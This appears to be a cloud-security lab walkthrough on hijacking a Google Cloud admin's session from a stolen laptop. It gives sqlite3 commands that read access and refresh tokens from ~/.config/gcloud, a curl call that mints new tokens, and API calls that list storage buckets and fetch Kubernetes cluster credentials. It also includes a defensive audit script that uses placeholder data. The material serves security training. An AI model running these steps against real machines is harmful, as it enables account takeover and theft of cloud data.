Stealing API Keys and Service Account Tokens

Introduction

OAuth is used for all Google authentication: user accounts and service accounts, browser and SDK external clients, as well as internal compute VMs. The resulting session tokens give an attacker an opportunity to hijack and reuse authenticated sessions.

What are we going to cover

We will be covering how session tokens on a Google Cloud admin's client machine can be hijacked to gain access to that user's Google Cloud environments. The scenario is a stolen developer laptop.

gcloud stores credentials and tokens in the ~/.config/gcloud folder as SQLite databases. We will perform some simple analysis on the credentials and token files and examine what can be abused.

Steps to attack

  • Change to the ~/.config/gcloud directory on the student machine.

  • Identify the currently logged-in gcloud account with gcloud auth list; this email address is the account_id used in the queries below.

  • Run the below sqlite3 command to extract the access token for the current Google Cloud user:

sqlite3 access_tokens.db "select access_token from access_tokens where account_id='{your-account-id}';"

  • The credentials.db holds a whole lot of information about the current Google Cloud user account, including the OAuth scopes and a refresh token. You can view it with the below command:

sqlite3 credentials.db "select value from credentials where account_id='{your-account-id}';"

  • Using the client ID, client secret and refresh token from the previous step, we can now mint a fresh access token, which can in turn be used to make API calls to other Google Cloud resources:

curl -s --data client_id=<your-client-id> --data client_secret=<your-client-secret> --data grant_type=refresh_token --data refresh_token=<your-refresh-token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

  • Let's make API calls to list the buckets in a project and then the objects in one bucket. Use the below curl commands for the same.

curl -s -H "Authorization: Bearer <token-generated-from-previous-step>" https://storage.googleapis.com/storage/v1/b?project=<project-name>

curl -s -H "Authorization: Bearer <token-generated-from-previous-step>" https://storage.googleapis.com/storage/v1/b/<bucket-name>/o?project=<project-name>
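Knowing what a copy of ~/.config/gcloud hands over is also the defender's starting point. The following audit script is an added example, not part of the original lab: it builds a constructed gcloud-style store with placeholder values in a temporary directory and reports, with secrets redacted, which accounts hold long-lived refresh tokens, their scopes, whether the cached access token has already expired, and whether the .db files are readable beyond their owner. The table layout (including the token_expiry column) is an assumption extended from the columns the lab queries.

```python
import json, os, sqlite3, stat, tempfile
from datetime import datetime, timezone

def build_sample_store(config_dir):
    """Create a constructed gcloud-style store with PLACEHOLDER values (not real credentials)."""
    db = sqlite3.connect(os.path.join(config_dir, "credentials.db"))
    db.execute("CREATE TABLE credentials (account_id TEXT PRIMARY KEY, value BLOB)")
    db.execute("INSERT INTO credentials VALUES (?, ?)", ("dev@example.com", json.dumps({
        "type": "authorized_user", "client_id": "PLACEHOLDER_CLIENT_ID",
        "client_secret": "PLACEHOLDER_CLIENT_SECRET", "refresh_token": "PLACEHOLDER_REFRESH_TOKEN",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform"]})))
    db.commit(); db.close()
    db = sqlite3.connect(os.path.join(config_dir, "access_tokens.db"))
    db.execute("CREATE TABLE access_tokens (account_id TEXT PRIMARY KEY, access_token TEXT, token_expiry TIMESTAMP)")
    db.execute("INSERT INTO access_tokens VALUES (?, ?, ?)",
               ("dev@example.com", "PLACEHOLDER_ACCESS_TOKEN", "2020-01-01 00:00:00"))
    db.commit(); db.close()
    os.chmod(os.path.join(config_dir, "credentials.db"), 0o644)   # deliberately too permissive
    os.chmod(os.path.join(config_dir, "access_tokens.db"), 0o600)  # owner-only, as it should be

def _rows(path, sql):
    with sqlite3.connect(path) as db:  # the context manager commits but does not close
        rows = db.execute(sql).fetchall()
    db.close(); return rows

def audit_gcloud_store(config_dir, now=None):
    """Report, with secrets redacted, what a copy of this directory would hand an attacker."""
    now = now or datetime.now(timezone.utc).replace(tzinfo=None)  # token_expiry is stored in UTC
    report = {"weak_permissions": [], "accounts": {}}
    for name in ("credentials.db", "access_tokens.db"):
        path = os.path.join(config_dir, name)
        if os.path.exists(path) and stat.S_IMODE(os.stat(path).st_mode) & 0o077:
            report["weak_permissions"].append(name)  # readable by group/other, not just the owner
    for account, value in _rows(os.path.join(config_dir, "credentials.db"), "SELECT account_id, value FROM credentials"):
        cred = json.loads(value)
        report["accounts"][account] = {"type": cred.get("type"),
            "has_refresh_token": bool(cred.get("refresh_token")),  # long-lived: revoke it if the device is lost
            "scopes": cred.get("scopes", []), "access_token_expired": None}
    for account, expiry in _rows(os.path.join(config_dir, "access_tokens.db"), "SELECT account_id, token_expiry FROM access_tokens"):
        expired = datetime.strptime(expiry, "%Y-%m-%d %H:%M:%S") < now
        report["accounts"].setdefault(account, {})["access_token_expired"] = expired
    return report

def demo():
    """Build the sample store in a temp dir and audit it (fixed clock so the result is reproducible)."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_store(d)
        return audit_gcloud_store(d, now=datetime(2024, 1, 1))
```

Running demo() flags credentials.db as too permissive and shows that an expired access token is irrelevant while a refresh token remains stored; pointing audit_gcloud_store at a real ~/.config/gcloud gives the inventory to act on with gcloud auth revoke after a device is lost.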

Bonus attack (Discussion)

Also, if the developer had a Kubernetes cluster deployed, we could have downloaded the cluster admin credentials and gained access to it.

gcloud container clusters list --access-token-file=token.txt --project=k8testing-354609

This lists the cluster names in the project.

  • Now we will generate the kubeconfig for the cluster (us-central1-c is a zone, so the zonal cluster is addressed with --zone):

gcloud container clusters get-credentials k8stest-cluster-1 --access-token-file=token.txt --project=k8testing-354609 --zone=us-central1-c

Additional references

No additional references here
